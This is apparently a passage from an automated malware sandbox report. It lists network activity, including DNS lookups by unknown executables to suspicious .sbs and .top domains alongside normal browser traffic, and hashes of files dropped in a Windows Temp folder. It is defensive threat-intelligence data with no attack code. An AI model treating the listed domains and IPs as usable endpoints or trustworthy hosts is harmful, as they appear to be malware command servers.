                                  1

                                  DNS Request

                                  frogs-severz.sbs

                                • 8.8.8.8:53
                                  occupy-blushi.sbs
                                  dns
                                  72c1b8c8ee.exe
                                  63 B
                                  95 B
                                  1
                                  1

                                  DNS Request

                                  occupy-blushi.sbs

                                  DNS Response

                                  104.21.7.169
                                  172.67.187.240

                                • 8.8.8.8:53
                                  blade-govern.sbs
                                  dns
                                  72c1b8c8ee.exe
                                  62 B
                                  94 B
                                  1
                                  1

                                  DNS Request

                                  blade-govern.sbs

                                  DNS Response

                                  172.67.153.209
                                  104.21.80.208

                                • 8.8.8.8:53
                                  story-tense-faz.sbs
                                  dns
                                  72c1b8c8ee.exe
                                  65 B
                                  97 B
                                  1
                                  1

                                  DNS Request

                                  story-tense-faz.sbs

                                  DNS Response

                                  104.21.1.25
                                  172.67.151.225

                                • 8.8.8.8:53
                                  leg-sate-boat.sbs
                                  dns
                                  72c1b8c8ee.exe
                                  63 B
                                  128 B
                                  1
                                  1

                                  DNS Request

                                  leg-sate-boat.sbs

                                • 8.8.8.8:53
                                  disobey-curly.sbs
                                  dns
                                  72c1b8c8ee.exe
                                  63 B
                                  95 B
                                  1
                                  1

                                  DNS Request

                                  disobey-curly.sbs

                                  DNS Response

                                  172.67.223.140
                                  104.21.70.128

                                • 8.8.8.8:53
                                  motion-treesz.sbs
                                  dns
                                  72c1b8c8ee.exe
                                  63 B
                                  95 B
                                  1
                                  1

                                  DNS Request

                                  motion-treesz.sbs

                                  DNS Response

                                  104.21.94.231
                                  172.67.141.76

                                • 8.8.8.8:53
                                  powerful-avoids.sbs
                                  dns
                                  72c1b8c8ee.exe
                                  65 B
                                  97 B
                                  1
                                  1

                                  DNS Request

                                  powerful-avoids.sbs

                                  DNS Response

                                  104.21.19.173
                                  172.67.187.4

                                • 8.8.8.8:53
                                  steamcommunity.com
                                  dns
                                  72c1b8c8ee.exe
                                  64 B
                                  80 B
                                  1
                                  1

                                  DNS Request

                                  steamcommunity.com

                                  DNS Response

                                  2.22.99.85

                                • 8.8.8.8:53
                                  marshal-zhukov.com
                                  dns
                                  72c1b8c8ee.exe
                                  64 B
                                  96 B
                                  1
                                  1

                                  DNS Request

                                  marshal-zhukov.com

                                  DNS Response

                                  172.67.160.80
                                  104.21.82.174

                                • 8.8.8.8:53
                                  fvtekk5pn.top
                                  dns
                                  ba9783936d.exe
                                  164 B
                                  216 B
                                  2
                                  2

                                  DNS Request

                                  fvtekk5pn.top

                                  DNS Request

                                  fvtekk5pn.top

                                  DNS Response

                                  34.116.198.130

                                • 8.8.8.8:53
                                  youtube.com
                                  dns
                                  firefox.exe
                                  114 B
                                  73 B
                                  2
                                  1

                                  DNS Request

                                  youtube.com

                                  DNS Request

                                  youtube.com

                                  DNS Response

                                  172.217.169.78

                                • 8.8.8.8:53
                                  spocs.getpocket.com
                                  dns
                                  firefox.exe
                                  65 B
                                  131 B
                                  1
                                  1

                                  DNS Request

                                  spocs.getpocket.com

                                  DNS Response

                                  34.117.188.166

                                • 8.8.8.8:53
                                  getpocket.cdn.mozilla.net
                                  dns
                                  firefox.exe
                                  71 B
                                  174 B
                                  1
                                  1

                                  DNS Request

                                  getpocket.cdn.mozilla.net

                                  DNS Response

                                  34.120.5.221

                                • 8.8.8.8:53
                                  prod.ads.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  164 B
                                  98 B
                                  2
                                  1

                                  DNS Request

                                  prod.ads.prod.webservices.mozgcp.net

                                  DNS Request

                                  prod.ads.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.117.188.166

                                • 8.8.8.8:53
                                  prod.pocket.prod.cloudops.mozgcp.net
                                  dns
                                  firefox.exe
                                  164 B
                                  98 B
                                  2
                                  1

                                  DNS Request

                                  prod.pocket.prod.cloudops.mozgcp.net

                                  DNS Request

                                  prod.pocket.prod.cloudops.mozgcp.net

                                  DNS Response

                                  34.120.5.221

                                • 8.8.8.8:53
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  103 B
                                  119 B
                                  1
                                  1

                                  DNS Request

                                  prod.content-signature-chains.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.160.144.191

                                • 8.8.8.8:53
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  103 B
                                  131 B
                                  1
                                  1

                                  DNS Request

                                  prod.content-signature-chains.prod.webservices.mozgcp.net

                                  DNS Response

                                  2600:1901:0:92a9::

                                • 8.8.8.8:53
                                  firefox-settings-attachments.cdn.mozilla.net
                                  dns
                                  firefox.exe
                                  90 B
                                  177 B
                                  1
                                  1

                                  DNS Request

                                  firefox-settings-attachments.cdn.mozilla.net

                                  DNS Response

                                  34.117.121.53

                                • 8.8.8.8:53
                                  prod.ads.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  82 B
                                  175 B
                                  1
                                  1

                                  DNS Request

                                  prod.ads.prod.webservices.mozgcp.net

                                • 8.8.8.8:53
                                  prod.pocket.prod.cloudops.mozgcp.net
                                  dns
                                  firefox.exe
                                  82 B
                                  110 B
                                  1
                                  1

                                  DNS Request

                                  prod.pocket.prod.cloudops.mozgcp.net

                                  DNS Response

                                  2600:1901:0:524c::

                                • 8.8.8.8:53
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  94 B
                                  110 B
                                  1
                                  1

                                  DNS Request

                                  prod.remote-settings.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.149.100.209

                                • 8.8.8.8:53
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  106 B
                                  122 B
                                  1
                                  1

                                  DNS Request

                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.117.121.53

                                • 8.8.8.8:53
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  94 B
                                  187 B
                                  1
                                  1

                                  DNS Request

                                  prod.remote-settings.prod.webservices.mozgcp.net

                                • 8.8.8.8:53
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  106 B
                                  199 B
                                  1
                                  1

                                  DNS Request

                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net

                                • 8.8.8.8:53
                                  youtube.com
                                  dns
                                  firefox.exe
                                  57 B
                                  73 B
                                  1
                                  1

                                  DNS Request

                                  youtube.com

                                  DNS Response

                                  172.217.169.78

                                • 8.8.8.8:53
                                  youtube.com
                                  dns
                                  firefox.exe
                                  57 B
                                  85 B
                                  1
                                  1

                                  DNS Request

                                  youtube.com

                                  DNS Response

                                  2a00:1450:4009:819::200e

                                • 8.8.8.8:53
                                  shavar.prod.mozaws.net
                                  dns
                                  firefox.exe
                                  68 B
                                  116 B
                                  1
                                  1

                                  DNS Request

                                  shavar.prod.mozaws.net

                                  DNS Response

                                  52.32.237.164
                                  52.27.142.243
                                  34.209.229.249

                                • 8.8.8.8:53
                                  shavar.prod.mozaws.net
                                  dns
                                  firefox.exe
                                  204 B
                                  153 B
                                  3
                                  1

                                  DNS Request

                                  shavar.prod.mozaws.net

                                  DNS Request

                                  shavar.prod.mozaws.net

                                  DNS Request

                                  shavar.prod.mozaws.net

                                • 172.217.169.78:443
                                  youtube.com
                                  https
                                  firefox.exe
                                  7.2kB
                                  15.4kB
                                  38
                                  21
                                • 8.8.8.8:53
                                  www.youtube.com
                                  dns
                                  firefox.exe
                                  183 B
                                  319 B
                                  3
                                  1

                                  DNS Request

                                  www.youtube.com

                                  DNS Request

                                  www.youtube.com

                                  DNS Request

                                  www.youtube.com

                                  DNS Response

                                  172.217.169.78
                                  142.250.180.14
                                  172.217.16.238
                                  142.250.179.238
                                  142.250.187.238
                                  216.58.204.78
                                  142.250.187.206
                                  142.250.200.14
                                  216.58.212.206
                                  172.217.169.46
                                  142.250.200.46
                                  216.58.201.110
                                  142.250.178.14
                                  216.58.212.238

                                • 8.8.8.8:53
                                  youtube-ui.l.google.com
                                  dns
                                  firefox.exe
                                  345 B
                                  293 B
                                  5
                                  1

                                  DNS Request

                                  youtube-ui.l.google.com

                                  DNS Request

                                  youtube-ui.l.google.com

                                  DNS Request

                                  youtube-ui.l.google.com

                                  DNS Request

                                  youtube-ui.l.google.com

                                  DNS Request

                                  youtube-ui.l.google.com

                                  DNS Response

                                  216.58.212.206
                                  216.58.212.238
                                  172.217.169.46
                                  172.217.169.78
                                  142.250.180.14
                                  142.250.178.14
                                  172.217.16.238
                                  216.58.201.110
                                  142.250.200.46
                                  142.250.200.14
                                  216.58.204.78
                                  142.250.187.206
                                  142.250.187.238
                                  142.250.179.238

                                • 172.217.169.78:443
                                  youtube-ui.l.google.com
                                  https
                                  firefox.exe
                                  7.8kB
                                  19.1kB
                                  33
                                  18
                                • 8.8.8.8:53
                                  consent.youtube.com
                                  dns
                                  firefox.exe
                                  65 B
                                  81 B
                                  1
                                  1

                                  DNS Request

                                  consent.youtube.com

                                  DNS Response

                                  216.58.201.110

                                • 8.8.8.8:53
                                  consent.youtube.com
                                  dns
                                  firefox.exe
                                  130 B
                                  81 B
                                  2
                                  1

                                  DNS Request

                                  consent.youtube.com

                                  DNS Request

                                  consent.youtube.com

                                  DNS Response

                                  216.58.201.110

                                • 8.8.8.8:53
                                  consent.youtube.com
                                  dns
                                  firefox.exe
                                  130 B
                                  93 B
                                  2
                                  1

                                  DNS Request

                                  consent.youtube.com

                                  DNS Request

                                  consent.youtube.com

                                  DNS Response

                                  2a00:1450:4009:826::200e

                                • 8.8.8.8:53
                                  fvtekk5pn.top
                                  dns
                                  ba9783936d.exe
                                  164 B
                                  216 B
                                  2
                                  2

                                  DNS Request

                                  fvtekk5pn.top

                                  DNS Request

                                  fvtekk5pn.top

                                  DNS Response

                                  34.116.198.130

                                • 216.58.201.110:443
                                  consent.youtube.com
                                  https
                                  firefox.exe
                                  6.4kB
                                  11.9kB
                                  19
                                  17
                                • 8.8.8.8:53
                                  youtube-ui.l.google.com
                                  dns
                                  firefox.exe
                                  69 B
                                  181 B
                                  1
                                  1

                                  DNS Request

                                  youtube-ui.l.google.com

                                  DNS Response

                                  2a00:1450:4009:827::200e
                                  2a00:1450:4009:818::200e
                                  2a00:1450:4009:80b::200e
                                  2a00:1450:4009:80a::200e

                                • 8.8.8.8:53
                                  www.google.com
                                  dns
                                  chrome.exe
                                  120 B
                                  76 B
                                  2
                                  1

                                  DNS Request

                                  www.google.com

                                  DNS Request

                                  www.google.com

                                  DNS Response

                                  172.217.16.228

                                • 8.8.8.8:53
                                  www.google.com
                                  dns
                                  chrome.exe
                                  60 B
                                  76 B
                                  1
                                  1

                                  DNS Request

                                  www.google.com

                                  DNS Response

                                  172.217.16.228

                                • 8.8.8.8:53
                                  www.google.com
                                  dns
                                  chrome.exe
                                  60 B
                                  88 B
                                  1
                                  1

                                  DNS Request

                                  www.google.com

                                  DNS Response

                                  2a00:1450:4009:821::2004

                                • 172.217.16.228:443
                                  www.google.com
                                  https
                                  firefox.exe
                                  10.3kB
                                  13.6kB
                                  15
                                  13
                                • 8.8.8.8:53
                                  consent.youtube.com
                                  dns
                                  firefox.exe
                                  260 B
                                  81 B
                                  4
                                  1

                                  DNS Request

                                  consent.youtube.com

                                  DNS Request

                                  consent.youtube.com

                                  DNS Request

                                  consent.youtube.com

                                  DNS Request

                                  consent.youtube.com

                                  DNS Response

                                  216.58.201.110

                                • 8.8.8.8:53
                                  consent.youtube.com
                                  dns
                                  firefox.exe
                                  65 B
                                  81 B
                                  1
                                  1

                                  DNS Request

                                  consent.youtube.com

                                  DNS Response

                                  216.58.201.110

                                • 172.217.16.228:443
                                  www.google.com
                                  https
                                  chrome.exe
                                  1.3kB
                                  3.8kB
                                  1
                                  3
                                • 8.8.8.8:53
                                  fvtekk5pn.top
                                  dns
                                  ba9783936d.exe
                                  164 B
                                  216 B
                                  2
                                  2

                                  DNS Request

                                  fvtekk5pn.top

                                  DNS Request

                                  fvtekk5pn.top

                                  DNS Response

                                  34.116.198.130

                                • 8.8.8.8:53
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  dns
                                  firefox.exe
                                  82 B
                                  98 B
                                  1
                                  1

                                  DNS Request

                                  prod.balrog.prod.cloudops.mozgcp.net

                                  DNS Response

                                  35.244.181.201

                                • 8.8.8.8:53
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  dns
                                  firefox.exe
                                  82 B
                                  175 B
                                  1
                                  1

                                  DNS Request

                                  prod.balrog.prod.cloudops.mozgcp.net

                                • 8.8.8.8:53
                                  ciscobinary.openh264.org
                                  dns
                                  firefox.exe
                                  70 B
                                  286 B
                                  1
                                  1

                                  DNS Request

                                  ciscobinary.openh264.org

                                  DNS Response

                                  88.221.134.209
                                  88.221.134.155

                                • 8.8.8.8:53
                                  a19.dscg10.akamai.net
                                  dns
                                  firefox.exe
                                  67 B
                                  99 B
                                  1
                                  1

                                  DNS Request

                                  a19.dscg10.akamai.net

                                  DNS Response

                                  88.221.134.209
                                  88.221.134.155

                                • 8.8.8.8:53
                                  a19.dscg10.akamai.net
                                  dns
                                  firefox.exe
                                  67 B
                                  123 B
                                  1
                                  1

                                  DNS Request

                                  a19.dscg10.akamai.net

                                  DNS Response

                                  2a02:26f0:a1::58dd:869b
                                  2a02:26f0:a1::58dd:86d1

                                • 8.8.8.8:53
                                  redirector.gvt1.com
                                  dns
                                  firefox.exe
                                  65 B
                                  81 B
                                  1
                                  1

                                  DNS Request

                                  redirector.gvt1.com

                                  DNS Response

                                  172.217.169.46

                                • 8.8.8.8:53
                                  redirector.gvt1.com
                                  dns
                                  firefox.exe
                                  65 B
                                  81 B
                                  1
                                  1

                                  DNS Request

                                  redirector.gvt1.com

                                  DNS Response

                                  172.217.169.46

                                • 8.8.8.8:53
                                  redirector.gvt1.com
                                  dns
                                  firefox.exe
                                  65 B
                                  93 B
                                  1
                                  1

                                  DNS Request

                                  redirector.gvt1.com

                                  DNS Response

                                  2a00:1450:4009:818::200e

                                • 172.217.169.46:443
                                  redirector.gvt1.com
                                  https
                                  firefox.exe
                                  3.3kB
                                  9.3kB
                                  8
                                  10
                                • 8.8.8.8:53
                                  r4---sn-4g5e6ns7.gvt1.com
                                  dns
                                  firefox.exe
                                  71 B
                                  116 B
                                  1
                                  1

                                  DNS Request

                                  r4---sn-4g5e6ns7.gvt1.com

                                  DNS Response

                                  173.194.182.73

                                • 8.8.8.8:53
                                  r4.sn-4g5e6ns7.gvt1.com
                                  dns
                                  firefox.exe
                                  69 B
                                  85 B
                                  1
                                  1

                                  DNS Request

                                  r4.sn-4g5e6ns7.gvt1.com

                                  DNS Response

                                  173.194.182.73

                                • 8.8.8.8:53
                                  r4.sn-4g5e6ns7.gvt1.com
                                  dns
                                  firefox.exe
                                  69 B
                                  97 B
                                  1
                                  1

                                  DNS Request

                                  r4.sn-4g5e6ns7.gvt1.com

                                  DNS Response

                                  2a00:1450:4001:5c::9

                                • 173.194.182.73:443
                                  r4.sn-4g5e6ns7.gvt1.com
                                  https
                                  firefox.exe
                                  1.8kB
                                  5.9kB
                                  5
                                  7
                                • 8.8.8.8:53
                                  play.google.com
                                  dns
                                  firefox.exe
                                  61 B
                                  77 B
                                  1
                                  1

                                  DNS Request

                                  play.google.com

                                  DNS Response

                                  142.250.187.206

                                • 8.8.8.8:53
                                  play.google.com
                                  dns
                                  firefox.exe
                                  61 B
                                  77 B
                                  1
                                  1

                                  DNS Request

                                  play.google.com

                                  DNS Response

                                  142.250.187.206

                                • 8.8.8.8:53
                                  play.google.com
                                  dns
                                  firefox.exe
                                  61 B
                                  89 B
                                  1
                                  1

                                  DNS Request

                                  play.google.com

                                  DNS Response

                                  2a00:1450:4009:81f::200e

                                • 142.250.187.206:443
                                  play.google.com
                                  https
                                  firefox.exe
                                  3.3kB
                                  9.3kB
                                  9
                                  10
                                • 8.8.8.8:53
                                  consent.youtube.com
                                  dns
                                  firefox.exe
                                  65 B
                                  81 B
                                  1
                                  1

                                  DNS Request

                                  consent.youtube.com

                                  DNS Response

                                  216.58.201.110

                                • 8.8.8.8:53
                                  consent.youtube.com
                                  dns
                                  firefox.exe
                                  65 B
                                  81 B
                                  1
                                  1

                                  DNS Request

                                  consent.youtube.com

                                  DNS Response

                                  216.58.201.110

                                • 216.58.201.110:443
                                  consent.youtube.com
                                  https
                                  firefox.exe
                                  2.3kB
                                  3.4kB
                                  4
                                  8
                                • 127.0.0.1:65269
                                  ba9783936d.exe

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                                  Filesize

                                  264KB

                                  MD5

                                  f50f89a0a91564d0b8a211f8921aa7de

                                  SHA1

                                  112403a17dd69d5b9018b8cede023cb3b54eab7d

                                  SHA256

                                  b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                  SHA512

                                  bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

                                  Filesize

                                  16B

                                  MD5

                                  18e723571b00fb1694a3bad6c78e4054

                                  SHA1

                                  afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                  SHA256

                                  8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                  SHA512

                                  43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\activity-stream.discovery_stream.json.tmp

                                  Filesize

                                  31KB

                                  MD5

                                  0bed4ce0e8404e7dde5d755b6994a308

                                  SHA1

                                  df0910f1a21d3fbb26f8d9a0653ac9c38591d45d

                                  SHA256

                                  992676f5b59331d3c010959bb88739809f50c8eca331413815be21d7bef9afee

                                  SHA512

                                  7398f304a34b3ca3bc4e653fce0397512daea735ad52aaaf7817e0d3fc1820e07838afffc95ceeebf357eb2640c90e8472a7a777a5cf262aca5eb07054007d4b

                                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                  Filesize

                                  13KB

                                  MD5

                                  f99b4984bd93547ff4ab09d35b9ed6d5

                                  SHA1

                                  73bf4d313cb094bb6ead04460da9547106794007

                                  SHA256

                                  402571262fd1f6dca336f822ceb0ec2a368a25dfe2f4bfa13b45c983e88b6069

                                  SHA512

                                  cd0ed84a24d3faae94290aca1b5ef65eef4cfba8a983da9f88ee3268fc611484a72bd44ca0947c0ca8de174619debae4604e15e4b2c364e636424ba1d37e1759

                                • C:\Users\Admin\AppData\Local\Temp\1009157001\1Shasou.exe

                                  Filesize

                                  29KB

                                  MD5

                                  d0038532ae6cec64be83bc19d0b8f695

                                  SHA1

                                  17a23380f80068d15ebc014cb2b1748bb45fb5c1

                                  SHA256

                                  b412dd132cb21a0d4d7bb622c6fe49f9e6c5c934201815d570db774ac80194f5

                                  SHA512

                                  af269471f7093445fb05bc6d6d185f9e48d0666674a3de50c4217757d3fdf39b067668bf2ca37eac91d5cb203c3ce3d4d634661e470d84d12c80c332344503ea

                                • C:\Users\Admin\AppData\Local\Temp\1009175001\ba9783936d.exe

                                  Filesize

                                  4.2MB

                                  MD5

                                  e3f5abc2332ea769c91f7c6f2a5a664a

                                  SHA1

                                  2969a201926786c2e4d03f215077d2abec517dec

                                  SHA256

                                  6bf3521dbb4d8610035627fd1ffba23169aaba4c7ed723522a1a73386edf5b69

                                  SHA512

                                  6a2f821451483ad5781b761bd9f462fcbf6239c1d6260d2af02f128680588c56fb4b03ad199a01334ce50d4a351393a2dd69abd345fe949434c5733078949f2a

                                • C:\Users\Admin\AppData\Local\Temp\1009176001\72c1b8c8ee.exe

                                  Filesize

                                  1.8MB

                                  MD5

                                  bce9e8eabe97a082a42366988424ae91

                                  SHA1

                                  45faa483f9c702fcf34b4fd566f18c8f499b7564

                                  SHA256

                                  6896d4a208e14bdc55e9eea19b8444e342cfb2d9959cc93f65b3d5fee398c304

                                  SHA512

                                  beb3e1a742f943fffa70137ede65034f3e1ccdae51afe0fdc3c787e8e3a54bd698bff6fef7093addb643b82ecde0f39aaca4a081c7811ebb5afdd7a47f4d936e

                                • C:\Users\Admin\AppData\Local\Temp\1009177001\f8bcf7e83e.exe

                                  Filesize

                                  1.7MB

                                  MD5

                                  15cecda155f7ea9681dbf0d4be3aa332

                                  SHA1

                                  ed967bd084181726638f727bb9dfb6ceca95b277

                                  SHA256

                                  8924897ed59d73e2c78cb532368cba7598f5e28898c9afcdca3ae39470ca2228

                                  SHA512

                                  a611c5d983365bafcf4f14640f9945db97e447d3f68f8ab81b8138a30462929a61bf67fa3a3b25e076e17837bb67bc79833b784dd524df1bba4724729c63fb4d

                                • C:\Users\Admin\AppData\Local\Temp\1009178001\3acce6d1d3.exe

                                  Filesize

                                  901KB

                                  MD5

                                  0346dcf691aa02ade7e7b6a3f2b68189

                                  SHA1

                                  31aa5bb397a78494c2072348206f876c7ccac680

                                  SHA256

                                  65b467397c90cb4b99cf0cb22ea90378edc09760e551e336a30bb90cbb29fcd5

                                  SHA512

                                  0e736ac2847a50921b27b2c72c1480652e2d193fbfed6c3e9c8b5f49bfbb1bbce47632ed1f19748b3a6fb23f0a207b808bf2fa02762ef3677839a79b62a5164c

                                • C:\Users\Admin\AppData\Local\Temp\1009179001\1e3bff8e53.exe

                                  Filesize

                                  1.0MB

                                  MD5

                                  91f5eafe7ce04310bd5480e11fbda9fc

                                  SHA1

                                  978844cb8cdd959a1245d48440323ce16ec5b30c

                                  SHA256

                                  9d23f79ada3f85a6727d2a66e611aef119138b3634d33a2dc699e3f93de8bfdf

                                  SHA512

                                  e838976cc4b78e6db68f7c15027e153857f809394399754d52fe43ef3ea1364f048c008f4503c3df12317bb071fa2f9e29f0a6435a6afa96aa27ddad0f7b4c04

                                • C:\Users\Admin\AppData\Local\Temp\Cab14F9.tmp

                                  Filesize

                                  70KB

                                  MD5

                                  49aebf8cbd62d92ac215b2923fb1b9f5

                                  SHA1

                                  1723be06719828dda65ad804298d0431f6aff976

                                  SHA256

                                  b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                  SHA512

                                  bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                • C:\Users\Admin\AppData\Local\Temp\Tar153B.tmp

                                  Filesize

                                  181KB

                                  MD5

                                  4ea6026cf93ec6338144661bf1202cd1

                                  SHA1

                                  a1dec9044f750ad887935a01430bf49322fbdcb7

                                  SHA256

                                  8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                  SHA512

                                  6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                  Filesize

                                  442KB

                                  MD5

                                  85430baed3398695717b0263807cf97c

                                  SHA1

                                  fffbee923cea216f50fce5d54219a188a5100f41

                                  SHA256

                                  a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

                                  SHA512

                                  06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

                                • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                                  Filesize

                                  8.0MB

                                  MD5

                                  a01c5ecd6108350ae23d2cddf0e77c17

                                  SHA1

                                  c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

                                  SHA256

                                  345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

                                  SHA512

                                  b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\db\data.safe.bin

                                  Filesize

                                  9KB

                                  MD5

                                  4d5b611c43ffc436871ca3d3381d1faa

                                  SHA1

                                  090df84675f9d3e5f144d9db8beb45e3543ddd85

                                  SHA256

                                  72e88ab8fbcc0014cf196f1ecd2b134bfdd8542e4c3139e15bac653b244a67f1

                                  SHA512

                                  e2ea6bddff109f1c85110b10c5979e8dda01e277210006a821fdcbb406ee48a5ec85bd55e16075d6b9bdd12dd341ee2a4f52fd12afb45e3f3f52c0d29311b1da

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\0a069ce9-4125-48b7-8800-b59b8d66702a

                                  Filesize

                                  733B

                                  MD5

                                  54e7ce0b20ffc891d9351cc23e160ed6

                                  SHA1

                                  f7a39df72989ef2458cc701fbc4a174a03aa5f94

                                  SHA256

                                  30138fee516009fcb2cd9c5c870951b4e617e14e2da43d9f45391784663b41b5

                                  SHA512

                                  4544dda92462d8df2cda6d9ea9cebb723df9fd177d0e989b6ea7294f7b72cd77d45bb0e712ad2e90eafe8d49d8bb77d6053564404d7d99b7e00547f063336098

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

                                  Filesize

                                  997KB

                                  MD5

                                  fe3355639648c417e8307c6d051e3e37

                                  SHA1

                                  f54602d4b4778da21bc97c7238fc66aa68c8ee34

                                  SHA256

                                  1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

                                  SHA512

                                  8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

                                  Filesize

                                  116B

                                  MD5

                                  3d33cdc0b3d281e67dd52e14435dd04f

                                  SHA1

                                  4db88689282fd4f9e9e6ab95fcbb23df6e6485db

                                  SHA256

                                  f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

                                  SHA512

                                  a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

                                  Filesize

                                  479B

                                  MD5

                                  49ddb419d96dceb9069018535fb2e2fc

                                  SHA1

                                  62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

                                  SHA256

                                  2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

                                  SHA512

                                  48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

                                  Filesize

                                  372B

                                  MD5

                                  8be33af717bb1b67fbd61c3f4b807e9e

                                  SHA1

                                  7cf17656d174d951957ff36810e874a134dd49e0

                                  SHA256

                                  e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

                                  SHA512

                                  6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

                                  Filesize

                                  11.8MB

                                  MD5

                                  33bf7b0439480effb9fb212efce87b13

                                  SHA1

                                  cee50f2745edc6dc291887b6075ca64d716f495a

                                  SHA256

                                  8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

                                  SHA512

                                  d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

                                  Filesize

                                  1KB

                                  MD5

                                  688bed3676d2104e7f17ae1cd2c59404

                                  SHA1

                                  952b2cdf783ac72fcb98338723e9afd38d47ad8e

                                  SHA256

                                  33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

                                  SHA512

                                  7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

                                  Filesize

                                  1KB

                                  MD5

                                  937326fead5fd401f6cca9118bd9ade9

                                  SHA1

                                  4526a57d4ae14ed29b37632c72aef3c408189d91

                                  SHA256

                                  68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

